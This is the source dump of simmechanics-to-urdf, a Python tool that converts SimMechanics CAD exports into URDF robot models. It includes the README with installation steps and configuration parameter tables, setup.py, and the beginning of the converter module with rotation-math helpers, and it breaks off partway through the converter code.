"simmechanics-to-urdf [![Build Status](https://travis-ci.org/robotology/simmechanics-to-urdf.svg?branch=master)](https://travis-ci.org/robotology/simmechanics-to-urdf)\n====================\n\n\n\nThis tool was developed to convert CAD models to URDF ( http://wiki.ros.org/urdf ) models semi-automatically. It makes use of the XML files exported by the SimMechanics Link . Mathworks, makers of SimMechanics, have developed plugins for a couple of leading CAD programs, including SolidWorks, ProEngineer and Inventor.\n\nMore specifically, this library at the moment just support first-generation SimMechanics XML files, that in MathWorks documentation are also referred as `PhysicalModelingXMLFile` .\n\nBased on the [original version](http://wiki.ros.org/simmechanics_to_urdf) by [David V. Lu!!](http://www.cse.wustl.edu/~dvl1/).\n\n**Warning: this tool only works with [MATLAB versions <= R2017b](https://github.com/robotology/simmechanics-to-urdf/issues/39) and [PTC Creo versions <= 8](https://github.com/robotology/simmechanics-to-urdf/issues/55). 
If you need to use either a newer version of MATLAB or a newer version of PTC Creo, you cannot use this tool.**\n\n#### Dependencies\n- [Python](https://www.python.org/)\n- [lxml](http://lxml.de/)\n- [PyYAML](http://pyyaml.org/)\n- [NumPy](http://www.numpy.org/)\n- [catkin_pkg](http://wiki.ros.org/catkin_pkg)\n- [urdf_parser_py](https://github.com/ros/urdf_parser_py)\n\n## Installation\n\n#### Windows\n##### Install dependencies\nThis conversion script uses Python, so you have to install Python for Windows:\nhttps://www.python.org/downloads/windows/ .\n\n#### OS X\n##### Install dependencies\nTo install the dependencies, an easy way is to have `pip` installed, which is the case\nif you use the python version provided by homebrew.\nIf you have `pip` installed you can get all necessary dependencies with:\n~~~\npip install lxml numpy pyyaml catkin_pkg\n~~~\n\n#### Debian/Ubuntu\n\n**As the installation procedure at this moment suggests installing `pip` packages at the system level via administrative privileges (such as `sudo`), it is suggested to follow it only on a dedicated environment, and not on your main development machine. See https://stackoverflow.com/a/22517157/1379427 for more details.**\n\n\n##### Install dependencies\nInstall the necessary dependencies with apt-get:\n~~~\nsudo apt-get install python-lxml python-yaml python-numpy python-setuptools python-catkin-pkg\n~~~\n\nYou can install `urdf_parser_py` from its git repository. Note that due to some regression in recent versions on the default branch of `urdf_parser_py` (see https://github.com/robotology/simmechanics-to-urdf/issues/36) it is recommended to use a specific commit of `urdf_parser_py` that is known to work, https://github.com/ros/urdf_parser_py/commit/31474b9baaf7c3845b40e5a9aa87d5900a2282c3 :\n~~~\ngit clone https://github.com/ros/urdf_parser_py\ncd urdf_parser_py\ngit checkout 31474b9baaf7c3845b40e5a9aa87d5900a2282c3\nsudo python setup.py install\n~~~\n\n##### Install simmechanics-to-urdf\nYou can then install `simmechanics-to-urdf`:\n~~~\ngit clone https://github.com/robotology/simmechanics-to-urdf\ncd simmechanics-to-urdf\nsudo python setup.py install\n~~~\n\n## How it works\nThe SimMechanics Link creates an XML file (PhysicalModelingXMLFile) and a collection of STL files. The XML describes all of the bodies, reference frames, inertial frames and joints for the model. The simmechanics_to_urdf script takes this information and converts it to a URDF. However, there are some tricks and caveats, which can be maneuvered using a couple of parameter files. Not properly specifying these parameter files will result in a model that looks correct when not moving, but possibly does not move correctly.\n\n### Tree vs. Graph\n\nURDF allows robot descriptions to only follow a tree structure, meaning that each link/body can have only one parent, and its position is dependent on the position of its parent and the position of the joint connecting it to its parent. This forces URDF descriptions to be in a tree structure.\n\nCAD files do not generally follow this restriction; one body can be dependent on multiple bodies, or at the very least, aligned to multiple bodies.\n\nThis creates two problems.\n\n - The graph must be converted into a tree structure. This is done by means of a breadth first traversal of the graph, starting from the root link. 
However, this sometimes leads to improper dependencies, which can be corrected with the parameter file, as described below.\n\n - Fixed joints in CAD are not always fixed in the exported XML. To best understand this, consider the example where you have bodies A, B and C, all connected to each other. If C is connected to A in such a way that it is constrained in the X and Z dimensions, and C is connected to B so that it is constrained in the Y dimension, then effectively, C is fixed/welded to both of those bodies. Thus removing the joint between B and C (which is needed to make the tree structure) frees up the joint. This also can be fixed with the parameter file.\n\n## Use the script\nYou can call the script:\n~~~\nsimmechanics_to_urdf {SimMechanics XML filename} --yaml [yaml_configfile] --csv-joint csv_joints_configfile --output {xml|graph|none}\n~~~\nThe `--output` option defines the output. Selecting graph, the script will output a graphviz .dot representation\nof the SimMechanics model, useful for debugging, while selecting xml, it will output the converted URDF.\n\n### Configuration files\n\n#### YAML Parameter File\nThe YAML format is used to pass parameters to the script to customize the conversion process.\nThe file is loaded using the Python [yaml](http://pyyaml.org/) module.\nThe parameters accepted by the script are documented in the following.\n\n\n##### Naming Parameters\n| Attribute name | Type | Default Value | Description |\n|:----------------:|:---------:|:------------:|:-------------:|\n| `robotName` | String | model name set in the file PhysicalModelingXMLFile | Used for setting the model name, i.e. the parameter `<robot name=\"...\">` in the `URDF` model file. |\n| `rename` | Map | {} (Empty Map) | Structure mapping the SimMechanics XML names to the desired URDF names. |\n\n\n##### Root Parameters\n| Attribute name | Type | Default Value | Description |\n|:----------------:|:------:|:------------:|:-------------:|\n| `root` | String | First body in the file | Changes the root body of the tree |\n| `originXYZ` | List | empty | Changes the position of the root body |\n| `originRPY` | List | empty | Changes the orientation of the root body |\n\n##### Algorithm Parameters\n| Attribute name | Type | Default Value | Description |\n|:----------------:|:------:|:-------------:|:-------------:|\n| `epsilon` | Float | 4*(Machine *eps*) | Set a custom value for testing whether a number is close to zero |\n\n##### Frame Parameters\n| Attribute name | Type | Default Value | Description |\n|:----------------:|:---------:|:------------:|:-------------:|\n| `linkFrames` | Array | empty | Structure mapping the link names to the displayName of their desired frame. Unfortunately in URDF the link frame origin placement is not free, but it is constrained to be placed on the parent joint axis, hence this option is for now reserved to the root link and to links connected to their parent by a fixed joint |\n| `exportAllUseradded` | Boolean | False | If true, export all SimMechanics frames tagged with `USERADDED` in the output URDF as fake links, i.e. fake links with zero mass connected to a link with a fixed joint. |\n| `exportedFrames` | Array | empty | Array of `displayName` of UserAdded frames to export. These are exported as fixed URDF frames, i.e. fake links with zero mass connected to a link with a fixed joint. |\n\n###### Link Frames Parameters (keys of elements of `linkFrames`)\n| Attribute name | Type | Default Value | Description |\n|:----------------:|:---------:|:-----------:|:-------------:|\n| `linkName` | String | Mandatory | Name of the link for which we want to set the frame |\n| `frameName` | String | Mandatory | `displayName` of the frame that we want to use as link frame. This frame should be attached to the `frameReferenceLink` link. The default value for `frameReferenceLink` is `linkName` |\n| `frameReferenceLink` | String | empty | Link at which the frame is attached. If `frameReferenceLink` is empty, it will default to `linkName` |\n\n\n\n###### Exported Frame Parameters (keys of elements of `exportedFrames`)\n| Attribute name | Type | Default Value | Description |\n|:----------------:|:---------:|:------------:|:-------------:|\n| `frameName` | String | Mandatory | `displayName` of the frame in which the sensor measure is expressed. The selected frame should be attached to the `frameReferenceLink` link, but `frameReferenceLink` can be omitted if the frameName is unique in the model. |\n| `frameReferenceLink` | String | empty | Link at which the frame is attached. If `frameReferenceLink` is empty, the first USERADDED frame with the specified `frameName` will be selected |\n| `exportedFrameName` | String | sensorName | Name of the URDF link exported by the `exportedFrames` option |\n| `additionalTransformation` | List | Empty | Additional transformation applied to the exported frame, it is expressed as [x, y, z, r, p, y] according to the semantics and units of the [SDF convention](http://sdformat.org/tutorials?tut=specify_pose&cat=specification&) for expressing poses. If the unmodified transformation of the additionalFrame is indicated as linkFrame_H_additionalFrameOld, this parameter specifies the additionalFrameOld_H_additionalFrame transform, and the final transform exported in the URDF is computed as linkFrame_H_additionalFrame = linkFrame_H_additionalFrameOld*additionalFrameOld_H_additionalFrame . If not specified, it is assumed to be the `[0, 0, 0, 0, 0, 0]` element and the specified frame is exported in the URDF unmodified. |\n\n##### Mesh Parameters\n| Attribute name | Type | Default Value | Description |\n|:----------------:|:---------:|:------------:|:-------------:|\n| `filenameformat` | String | %s | Used for translating the filenames in the exported XML to the URDF filenames, using a formatting string. Example: \"package://my_package//folder/%sb\" - resolves to the package name and adds a \"b\" at the end to indicate a binary stl. |\n| `filenameformatchangeext` | String | %s | Similar to filenameformat, but used to also change the file extensions and not only the path of the filenames |\n| `forcelowercase` | Boolean | False | Used for translating the filenames. If True, it forces all filenames to be lower case. |\n| `scale` | String | None | If this parameter is defined, the scale attribute of the mesh in the URDF will be set to its value. Example: \"0.01 0.01 0.01\" - if your meshes were saved using centimeters as units instead of meters. |\n| `stringToRemoveFromMeshFileName` | String | None | This parameter allows specifying a string that will be removed from the mesh file names. Example: \"_prt\" |\n| `assignedCollisionGeometry` | Array | None | Structure for redefining the collision geometry for a given link. |\n| `assignedColors` | Map | {} (Empty Map) | If a link is in this map, the color found in the SimMechanics file is substituted with the one passed through this map. The color is represented by a 4 element vector containing numbers from 0 to 1 representing the red, green, blue and alpha component. |\n\n###### Assigned collision geometries (keys of elements of `assignedCollisionGeometry`)\n| Attribute name | Type | Default Value | Description |\n|:----------------:|:---------:|:------------:|:-------------:|\n| `linkName` | String | Mandatory | Name of the link for which the collision geometry is specified. |\n| `geometricShape` | Dictionary | Mandatory | This dictionary contains the parameters used to define the type and the position of the geometric shape. In particular we have: <ul><li>shape: geometric shape type. Supported \"box\", \"cylinder\", \"sphere\". </li><li>type dependent geometric shape parameters. Refer to [SDF Geometry](http://sdformat.org/spec?elem=geometry). </li><li>origin: String defining the pose of the geometric shape with respect to the `linkFrame`. </li></ul> |\n\n~~~\nassignedCollisionGeometry:\n  - linkName: r_foot\n    geometricShape:\n      shape: cylinder\n      radius: 0.16\n      length: 0.06\n      origin: \"0.0 0.03 0.0 1.57079632679 0.0 0.0\"\n  - linkName: l_foot\n    geometricShape:\n      shape: box\n      size: 0.4 0.2 0.1\n      origin: \"0.0 0.0 0.0 0.0 0.0 0.0\"\n~~~\n\n\n##### Inertia parameters\nParameters related to the inertial parameters of a link\n\n| Attribute name | Type | Default Value | Description |\n|:----------------:|:---------:|:------------:|:-------------:|\n| `assignedMasses` | Map | {} (Empty Map) | If a link is in this map, the mass found in the SimMechanics file is substituted with the one passed through this map. Furthermore, the inertia matrix present in the SimMechanics file is scaled accounting for the new mass (i.e. multiplied by new_mass/old_mass). The mass is expressed in Kg. |\n| `assignedInertias` | Array | empty | Structure for redefining the inertia tensor (at the COM) for a given link. |\n\n###### Assigned Inertias parameters (elements of `assignedInertias` parameters)\n| Attribute name | Type | Default Value | Description |\n|:----------------:|:---------:|:-----------:|:-------------:|\n| `linkName` | String | Mandatory | Name of the link for which we want to set the inertia |\n| `xx` | String | empty | If defined, change the Ixx value of the inertia matrix of the link. Unit of measure: Kg*m^2 . |\n| `yy` | String | empty | If defined, change the Iyy value of the inertia matrix of the link. Unit of measure: Kg*m^2 . |\n| `zz` | String | empty | If defined, change the Izz value of the inertia matrix of the link. Unit of measure: Kg*m^2 . |\n\n~~~\nassignedMasses:\n  link1: 1\n  link2: 3\n\nassignedInertias:\n  - linkName: link1\n    xx: 0.0001\n  - linkName: link1\n    xx: 0.0003\n    yy: 0.0003\n    zz: 0.0003\n~~~\n\n##### Sensors Parameters\nSensor information can be expressed using arrays of sensor options.\nNote that given that the URDF still does not support an official format for expressing sensor information,\nthis script will output two different elements for each sensor:\n* a `<gazebo>` element, necessary to simulate the sensor in Gazebo when loading the URDF, as documented in http://gazebosim.org/tutorials?tut=ros_gzplugins .\n* a more URDF-like `<sensor>` element, in particular the variant supported by the iDynTree library, as documented in https://github.com/robotology/idyntree/blob/master/doc/model_loading.md .\n\n\n| Attribute name | Type | Default Value | Description |\n|:----------------:|:---------:|:------------:|:-------------:|\n| `forceTorqueSensors` | Array | empty | Array of options for exporting 6-Axis ForceTorque sensors |\n| `sensors` | Array | empty | Array of options for exporting generic sensors (e.g. camera, depth, imu, ray..) |\n\n###### ForceTorque Sensors Parameters (keys of elements of `forceTorqueSensors`)\n| Attribute name | Type | Default Value | Description |\n|:----------------:|:---------:|:------------:|:-------------:|\n| `jointName` | String | empty | Name of the Joint for which this sensor measures the ForceTorque. |\n| `directionChildToParent` | Bool | True | True if the sensor measures the force exerted by the child on the parent, false otherwise |\n| `sensorName` | String | jointName | Name of the sensor, to be used in the output URDF file |\n| `exportFrameInURDF` | Bool | False | If true, export a fake URDF link whose frame is coincident with the sensor frame (as if the sensor frame was added to the `exportedFrames` array). |\n| `exportedFrameName` | String | `sensorName` if defined `jointName` otherwise | Name of the URDF link exported by the `exportFrameInURDF` option |\n| `frameName` | String | empty | Name of the frame in which the sensor measure is expressed. Mandatory if `exportFrameInURDF` is set to yes. |\n| `linkName` | String | empty | Name of the parent link at which the sensor is rigidly attached. Mandatory if `exportFrameInURDF` is set to yes. |\n| `frameReferenceLink` | String | `linkName` | Link at which the sensor frame is attached (to make sense, this link should be rigidly attached to the `linkName`). By default `frameReferenceLink` is assumed to be `linkName`.\n| `frame` | String | empty | The value of this element may be one of: child, parent, or sensor. It is the frame in which the forces and torques should be expressed. The values parent and child refer to the parent or child links of the joint. The value sensor means the measurement is rotated by the rotation component of the `<pose>` of this sensor. The translation component of the pose has no effect on the measurement. |\n| `sensorBlobs` | String | empty | Array of strings (possibly on multiple lines) representing complex XML blobs that will be included as child of the `<sensor>` element of type \"force_torque\" |\n\nNote that for now the FT sensor frame is required to be coincident with the child link frame, due\nto URDF limitations.\n\n###### Generic Sensors Parameters (keys of elements of `sensors`)\n| Attribute name | Type | Default Value | Description |\n|:----------------:|:---------:|:------------:|:-------------:|\n| `linkName` | String | Mandatory | Name of the Link at which the sensor is rigidly attached. |\n| `frameName` | String | empty | `displayName` of the frame in which the sensor measure is expressed. The selected frame must be attached to the `frameReferenceLink` link. If empty the frame used for the sensor is coincident with the link frame. |\n| `frameReferenceLink` | String | linkName | Link at which the sensor frame is attached (to make sense, this link should be rigidly attached to the `linkName`). By default `frameReferenceLink` is assumed to be `linkName`.\n| `sensorName` | String | LinkName_FrameName | Name of the sensor, to be used in the output URDF file |\n| `exportFrameInURDF` | Bool | False | If true, export a fake URDF link whose frame is coincident with the sensor frame (as if the sensor frame was added to the `exportedFrames` array) |\n| `exportedFrameName` | String | sensorName | Name of the URDF link exported by the `exportFrameInURDF` option |\n| `sensorType` | String | Mandatory | Type of sensor. Supported: \"altimeter\", \"camera\", \"contact\", \"depth\", \"gps\", \"gpu_ray\", \"imu\", \"logical_camera\", \"magnetometer\", \"multicamera\", \"ray\", \"rfid\", \"rfidtag\", \"sonar\", \"wireless_receiver\", \"wireless_transmitter\" |\n| `updateRate` | String | Mandatory | Number representing the update rate of the sensor. Expressed in [Hz]. |\n| `sensorBlobs` | String | empty | Array of strings (possibly on multiple lines) representing complex XML blobs that will be included as child of the `<sensor>` element |\n\n##### Mirrored Inertia Parameters\nSimMechanics Link has some problems dealing with mirrored mechanisms, particularly when dealing with exporting inertia information. For this reason we provide\nan option to use for some links not the inertial information (mass, center of mass, inertia matrix) provided in the SimMechanics XML, but instead to \"mirror\"\nthe inertia information of some other link, relying on the symmetry of the model.\n\nTODO document this part\n\n##### XML Blobs options\nIf you use extensions of URDF, you frequently want to add non-standard tags as child of the `<robot>` root element.\nUsing the XMLBlobs option, you can pass an array of strings (even on multiple lines) representing complex XML blobs that you\nwant to include in the converted URDF file. These will be included without modifications in the converted URDF file.\nNote that every blob must have only one root element.\n\n| Attribute name | Type | Default Value | Description |\n|:----------------:|:---------:|:------------:|:-------------:|\n| `XMLBlobs ` | Array of String | [] (empty array) | List of XML Blobs to include in the URDF file as children of `<robot>` |\n\n#### CSV Parameter File\nUsing the `--csv-joints` option it is possible to load some joint-related information from a csv\nfile. The rationale for using CSV over YAML for some information related to the model (for example joint limits) is to use a format that is easier to modify using common spreadsheet tools like Excel/LibreOffice Calc, which can be easily used also by people without a background in computer science.\n\n##### Format\nThe CSV file is loaded by the python `csv` module, so every dialect supported\nby the [`csv.Sniffer()`](https://docs.python.org/library/csv.html#csv.Sniffer) is automatically\nsupported by `simmechanics-to-urdf`.\n\nThe CSV file is formed by a header line followed by several content lines,\nas in this example:\n~~~\njoint_name,lower_limit,upper_limit\ntorso_yaw,-20.0,20.0\ntorso_roll,-20.0,20.0\n~~~\n\nThe order of the elements in the header line is arbitrary, but the supported attributes\nare listed in the following:\n\n| Attribute name | Required | Unit of Measure | Description |\n|:--------------:|:--------:|:----------------:|:---------------:|\n| joint_name | **Yes** | - | Name of the joint to which the content line is referring |\n| lower_limit | No | Degrees | `lower` attribute of the `limit` child element of the URDF `joint`. **Please note that we specify this limit here in Degrees, but in the urdf it is expressed in Radians, the script will take care of internally converting this parameter.** |\n| upper_limit | No | Degrees | `upper` attribute of the `limit` child element of the URDF `joint`. **Please note that we specify this limit here in Degrees, but in the urdf it is expressed in Radians, the script will take care of internally converting this parameter.** |\n| velocity_limit | No | Radians/second | `velocity` attribute of the `limit` child element of the URDF `joint`. |\n| effort_limit | No | Newton meters | `effort` attribute of the `limit` child element of the URDF `joint`.\n| damping | No | Newton meter seconds / radians | `damping` of the `dynamics` child element of the URDF `joint`. |\n| friction | No | Newton meters | `friction` of the `dynamics` child element of the URDF `joint`. |\n" }, { "alpha_fraction": 0.5492505431175232, "alphanum_fraction": 0.5631691813468933, "avg_line_length": 28.303030014038086, "blob_id": "34f2e079ae096832d97b02e8ee3b440604220764", "content_id": "3ca919a0f0e61de8aa875c1679d80d775acc6a25", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 934, "license_type": "no_license", "max_line_length": 71, "num_lines": 33, "path": "/setup.py", "repo_name": "robotology/simmechanics-to-urdf", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nimport sys\nfrom setuptools import setup, find_packages\n\n\nsetup(name='simmechanics_to_urdf',\n      version='0.4.1',\n      description='Converts SimMechanics XML to URDF',\n      author='Silvio Traversaro, David V. 
Lu',\n author_email='[email protected]',\n url='https://github.com/robotology/simmechanics-to-urdf',\n packages=['simmechanics_to_urdf'],\n licence='BSD',\n classifiers=[\n \"Development Status :: 3 - Alpha\",\n \"License :: OSI Approved :: BSD License\",\n \"Operating System :: OS Independent\",\n 'Programming Language :: Python :: 2.6',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3.3'\n ],\n install_requires=[\n \"lxml\",\n \"numpy\",\n \"PyYAML >= 3.10\"\n ],\n entry_points={\n 'console_scripts': [\n 'simmechanics_to_urdf = simmechanics_to_urdf.firstgen:main',\n ]\n }\n )\n" }, { "alpha_fraction": 0.5520120859146118, "alphanum_fraction": 0.5625278949737549, "avg_line_length": 42.7359733581543, "blob_id": "9c23611994db9695d8f6398ff112da818ac46a8d", "content_id": "0a0bf6b20af26589093a6a02067d569fa46fe524", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 87297, "license_type": "no_license", "max_line_length": 219, "num_lines": 1996, "path": "/simmechanics_to_urdf/firstgen.py", "repo_name": "robotology/simmechanics-to-urdf", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nimport sys\nimport os\n\nimport xml.dom.minidom\nimport lxml.etree\nimport math\nimport numpy # for creating matrix to convert to quaternion\nimport yaml\nimport urdf_parser_py.urdf\nimport argparse\nimport csv\n\n# Conversion Factors\nINCH2METER = 0.0254\nSLUG2KG = 14.5939029\nSLUGININ2KGMM = .009415402\nMM2M = .001\n\n# Special Reference Frame(s)\nWORLD = \"WORLD\"\n\n# Arbitrary List of colors to give pieces different looks\nCOLORS = [(\"green\", (0, 1, 0, 1)), (\"black\", (0, 0, 0, 1)), (\"red\", (1, 0, 0, 1)),\n (\"blue\", (0, 0, 1, 1)), (\"yellow\", (1, 1, 0, 1)), (\"pink\", (1, 0, 1, 1)),\n (\"cyan\", (0, 1, 1, 1)), (\"green\", (0, 1, 0, 1)), (\"white\", (1, 1, 1, 1)),\n (\"dblue\", (0, 0, .8, 1)), (\"dgreen\", (.1, .8, .1, 1)), (\"gray\", (.5, .5, .5, 1))]\n\n# List of supported sensor types\nSENSOR_TYPES = [\"altimeter\", \"camera\", \"contact\", \"depth\", \"gps\", \"gpu_ray\", \"imu\", \"accelerometer\", \"gyroscope\",\n \"logical_camera\",\n \"magnetometer\", \"multicamera\", \"ray\", \"rfid\", \"rfidtag\", \"sonar\", \"wireless_receiver\",\n \"wireless_transmitter\"]\n\n# List of supported geometric shapes and their properties\nGEOMETRIC_SHAPES = {\n 'box': ['origin', 'size'],\n 'cylinder': ['origin', 'radius', 'length', ],\n 'sphere': ['origin', 'radius']}\n\n# epsilon for testing whether a number is close to zero\n_EPS = numpy.finfo(float).eps * 4.0\n\n# axis sequences for Euler angles\n_NEXT_AXIS = [1, 2, 0, 1]\n\n# map axes strings to/from tuples of inner axis, parity, repetition, frame\n_AXES2TUPLE = {\n 'sxyz': (0, 0, 0, 0), 'sxyx': (0, 0, 1, 0), 'sxzy': (0, 1, 0, 0),\n 'sxzx': (0, 1, 1, 0), 'syzx': (1, 0, 0, 0), 'syzy': (1, 0, 1, 0),\n 'syxz': (1, 1, 0, 0), 'syxy': (1, 1, 1, 0), 'szxy': (2, 0, 0, 0),\n 'szxz': (2, 0, 1, 0), 'szyx': (2, 1, 0, 0), 'szyz': (2, 1, 1, 0),\n 'rzyx': (0, 0, 0, 1), 'rxyx': (0, 0, 1, 1), 'ryzx': (0, 1, 0, 1),\n 'rxzx': (0, 1, 1, 1), 'rxzy': (1, 0, 0, 1), 'ryzy': (1, 0, 1, 1),\n 'rzxy': (1, 1, 0, 1), 'ryxy': (1, 1, 1, 1), 'ryxz': (2, 0, 0, 1),\n 'rzxz': (2, 0, 1, 1), 'rxyz': (2, 1, 0, 1), 'rzyz': (2, 1, 1, 1)}\n\n_TUPLE2AXES = dict((v, k) for k, v in _AXES2TUPLE.items())\n\n\ndef euler_matrix(ai, aj, ak, axes='sxyz'):\n \"\"\"Return homogeneous rotation matrix from Euler angles and axis sequence.\n\n ai, aj, ak : Euler's roll, pitch and yaw angles\n axes : One of 24 axis sequences 
as string or encoded tuple\n\n >>> R = euler_matrix(1, 2, 3, 'syxz')\n >>> numpy.allclose(numpy.sum(R[0]), -1.34786452)\n True\n >>> R = euler_matrix(1, 2, 3, (0, 1, 0, 1))\n >>> numpy.allclose(numpy.sum(R[0]), -0.383436184)\n True\n >>> ai, aj, ak = (4*math.pi) * (numpy.random.random(3) - 0.5)\n >>> for axes in _AXES2TUPLE.keys():\n ... R = euler_matrix(ai, aj, ak, axes)\n >>> for axes in _TUPLE2AXES.keys():\n ... R = euler_matrix(ai, aj, ak, axes)\n\n \"\"\"\n try:\n firstaxis, parity, repetition, frame = _AXES2TUPLE[axes]\n except (AttributeError, KeyError):\n _TUPLE2AXES[axes] # noqa: validation\n firstaxis, parity, repetition, frame = axes\n\n i = firstaxis\n j = _NEXT_AXIS[i+parity]\n k = _NEXT_AXIS[i-parity+1]\n\n if frame:\n ai, ak = ak, ai\n if parity:\n ai, aj, ak = -ai, -aj, -ak\n\n si, sj, sk = math.sin(ai), math.sin(aj), math.sin(ak)\n ci, cj, ck = math.cos(ai), math.cos(aj), math.cos(ak)\n cc, cs = ci*ck, ci*sk\n sc, ss = si*ck, si*sk\n\n M = numpy.identity(4)\n if repetition:\n M[i, i] = cj\n M[i, j] = sj*si\n M[i, k] = sj*ci\n M[j, i] = sj*sk\n M[j, j] = -cj*ss+cc\n M[j, k] = -cj*cs-sc\n M[k, i] = -sj*ck\n M[k, j] = cj*sc+cs\n M[k, k] = cj*cc-ss\n else:\n M[i, i] = cj*ck\n M[i, j] = sj*sc-cs\n M[i, k] = sj*cc+ss\n M[j, i] = cj*sk\n M[j, j] = sj*ss+cc\n M[j, k] = sj*cs-sc\n M[k, i] = -sj\n M[k, j] = cj*si\n M[k, k] = cj*ci\n return M\n\ndef euler_from_matrix(matrix, axes='sxyz'):\n \"\"\"Return Euler angles from rotation matrix for specified axis sequence.\n\naxes : One of 24 axis sequences as string or encoded tuple\n\nNote that many Euler angle triplets can describe one matrix.\n\n>>> R0 = euler_matrix(1, 2, 3, 'syxz')\n>>> al, be, ga = euler_from_matrix(R0, 'syxz')\n>>> R1 = euler_matrix(al, be, ga, 'syxz')\n>>> numpy.allclose(R0, R1)\nTrue\n>>> angles = (4.0*math.pi) * (numpy.random.random(3) - 0.5)\n>>> for axes in _AXES2TUPLE.keys():\n... R0 = euler_matrix(axes=axes, *angles)\n... R1 = euler_matrix(axes=axes, *euler_from_matrix(R0, axes))\n... 
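\n>>> # Editor-added example (an illustrative addition, not an original doctest):\n>>> # one explicit round trip with the default 'sxyz' ordering.\n>>> Rrt = euler_matrix(0.1, 0.2, 0.3, 'sxyz')\n>>> numpy.allclose(euler_from_matrix(Rrt, 'sxyz'), (0.1, 0.2, 0.3))\nTrue\n... 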
if not numpy.allclose(R0, R1): print axes, \"failed\"\n\n\"\"\"\n try:\n firstaxis, parity, repetition, frame = _AXES2TUPLE[axes.lower()]\n except (AttributeError, KeyError):\n _ = _TUPLE2AXES[axes]\n firstaxis, parity, repetition, frame = axes\n\n i = firstaxis\n j = _NEXT_AXIS[i + parity]\n k = _NEXT_AXIS[i - parity + 1]\n\n M = numpy.array(matrix, dtype=numpy.float64, copy=False)[:3, :3]\n if repetition:\n sy = math.sqrt(M[i, j] * M[i, j] + M[i, k] * M[i, k])\n if sy > _EPS:\n ax = math.atan2(M[i, j], M[i, k])\n ay = math.atan2(sy, M[i, i])\n az = math.atan2(M[j, i], -M[k, i])\n else:\n ax = math.atan2(-M[j, k], M[j, j])\n ay = math.atan2(sy, M[i, i])\n az = 0.0\n else:\n cy = math.sqrt(M[i, i] * M[i, i] + M[j, i] * M[j, i])\n if cy > _EPS:\n ax = math.atan2(M[k, j], M[k, k])\n ay = math.atan2(-M[k, i], cy)\n az = math.atan2(M[j, i], M[i, i])\n else:\n ax = math.atan2(-M[j, k], M[j, j])\n ay = math.atan2(-M[k, i], cy)\n az = 0.0\n\n if parity:\n ax, ay, az = -ax, -ay, -az\n if frame:\n ax, az = az, ax\n return ax, ay, az\n\n\ndef euler_from_quaternion(quaternion, axes='sxyz'):\n \"\"\"Return Euler angles from quaternion for specified axis sequence.\n\n >>> angles = euler_from_quaternion([0.06146124, 0, 0, 0.99810947])\n >>> numpy.allclose(angles, [0.123, 0, 0])\n True\n \"\"\"\n return euler_from_matrix(quaternion_matrix(quaternion), axes)\n\n\nclass Converter:\n def __init__(self):\n # initialize member variables\n self.links = {}\n self.frames = {}\n self.joints = {}\n self.names = {}\n self.colormap = {}\n self.colorindex = 0\n self.ref2nameMap = {}\n self.realRootLink = None\n self.outputString = \"\".encode('UTF-8')\n self.sensorIsValid = False\n self.sensorsDefaultMap = {}\n # map mapping USERADDED linkName+displayName to fid of the frame\n self.linkNameDisplayName2fid = {}\n\n # Start the Custom Transform Manager\n self.tfman = CustomTransformManager()\n\n # Extra Transforms for Debugging\n self.tfman.add([0, 0, 0], [0.70682518, 0, 0, 0.70682518], \"ROOT\", WORLD) # rotate so Z axis is up\n\n # convert sensor type to gazebo respective sensor type\n self.sensorTypeUrdf2sdf = {'imu': 'imu', 'accelerometer': 'imu', 'gyroscope': 'imu'}\n\n def convert(self, filename, yaml_configfile, csv_configfile, mode, outputfile_name):\n self.mode = mode\n\n # Parse the global YAML configuration file\n self.parseYAMLConfig(yaml_configfile)\n\n # Parse the joint CSV configuratio nfile\n self.parseJointCSVConfig(csv_configfile)\n\n # Parse the input file\n self.parse(xml.dom.minidom.parse(filename))\n self.buildTree(self.root)\n\n # Create the output\n self.output(self.root)\n\n # output the output\n if mode == \"xml\":\n # print(\"URDF model to print : \\n \" + str(self.result) + \"\\n\" )\n self.generateXML()\n addXMLBlobs(self.XMLBlobs, self.urdf_xml)\n self.addSensors()\n self.addOrigin()\n self.outputString = lxml.etree.tostring(self.urdf_xml, pretty_print=True)\n\n if mode == \"graph\":\n self.outputString = self.graph().encode('UTF-8')\n\n if mode == \"debug\":\n self.debugPrints()\n\n # save the output to file or print in the terminal\n if (outputfile_name is not None):\n f = open(outputfile_name, 'wb')\n f.write(self.outputString)\n f.close()\n else:\n print(self.outputString)\n\n def debugPrints(self):\n print(\n \"root_link_T_l_foot_CG :\\n \" + str(self.tfman.getHomTransform(\"X\" + \"root_link\", \"l_foot\" + \"CG\")[:3, 3]));\n print(\n \"root_link_T_r_foot_CG :\\n \" + str(self.tfman.getHomTransform(\"X\" + \"root_link\", \"r_foot\" + \"CG\")[:3, 3]));\n\n def generateXML(self):\n 
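\"\"\"Serialize the robot model assembled in self.result into an XML element tree, stored in self.urdf_xml.\"\"\"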
self.urdf_xml = self.result.to_xml();\n\n def addSensors(self):\n generatorGazeboSensors = URDFGazeboSensorsGenerator();\n generatorURDFSensors = URDFSensorsGenerator();\n # for the ft sensors, load the sensors as described in the YAML without further check\n for ftSens in self.forceTorqueSensors:\n referenceJoint = ftSens[\"jointName\"];\n frame = ftSens.get(\"frame\");\n frameName = ftSens.get(\"frameName\");\n if ('sensorName' not in ftSens.keys()):\n sensorName = referenceJoint\n else:\n sensorName = ftSens[\"sensorName\"];\n sensorBlobs = ftSens.get(\"sensorBlobs\");\n\n if (frameName is None):\n # If frame is not specified, the sensor frame is the link frame\n offset = [0.0, 0.0, 0.0];\n rot = quaternion_from_matrix(numpy.identity(4));\n else:\n # The default referenceLink is the sensorLink itself\n sensorJoint = self.joints[referenceJoint];\n for key in self.linkNameDisplayName2fid.keys():\n # Since frameName is univoque in the map\n if (frameName in key):\n referenceLink = key[0];\n # Get user added frame\n sensor_frame_fid = self.linkNameDisplayName2fid[(referenceLink, frameName)];\n (offset, rot) = self.tfman.get(\"X\" + referenceLink, sensor_frame_fid)\n pose = toGazeboPose(offset, rot);\n # Add sensor in Gazebo format\n ft_gazebo_el = generatorGazeboSensors.getURDFForceTorque(referenceJoint, sensorName,\n ftSens[\"directionChildToParent\"],\n sensorBlobs, frame, pose)\n self.urdf_xml.append(ft_gazebo_el);\n urdf_origin_el = toURDFOriginXMLElement(offset, rot);\n # Add sensor in URDF format\n 